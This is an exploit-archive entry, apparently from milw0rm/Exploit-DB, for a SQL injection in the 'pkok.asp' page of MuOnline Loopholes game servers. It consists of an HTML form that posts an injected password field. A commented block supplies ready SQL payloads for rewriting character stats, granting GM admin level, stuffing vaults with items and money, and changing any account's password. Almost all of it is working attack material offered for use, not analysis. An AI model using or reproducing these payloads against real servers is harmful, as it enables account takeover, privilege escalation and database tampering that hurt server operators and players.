MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection

EDB-ID:

1252

CVE:

N/A

Author:

nukedx

Type:

webapps

Platform:

ASP

Published:

2005-10-15

<!--
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address

Some SQL Examples:

-Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--

Classcodes arE:
0: Dark Wizard
1: Soul Master
16: Dark knight
17: Blade knight
32: Elf
33: Muse Elf
48: Magic Gladiator
64: Dark Lord

Ctlcode is admin level code:
0:Normal
1: Blocked
8: GM
16: GM LVL2

-Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--

ITEMCODE is which u can get from itemproject.exe u can find it on google ;)

-Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
Enjoy
-->

<html>
<form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!">
</form>
</html>

# milw0rm.com [2005-10-15]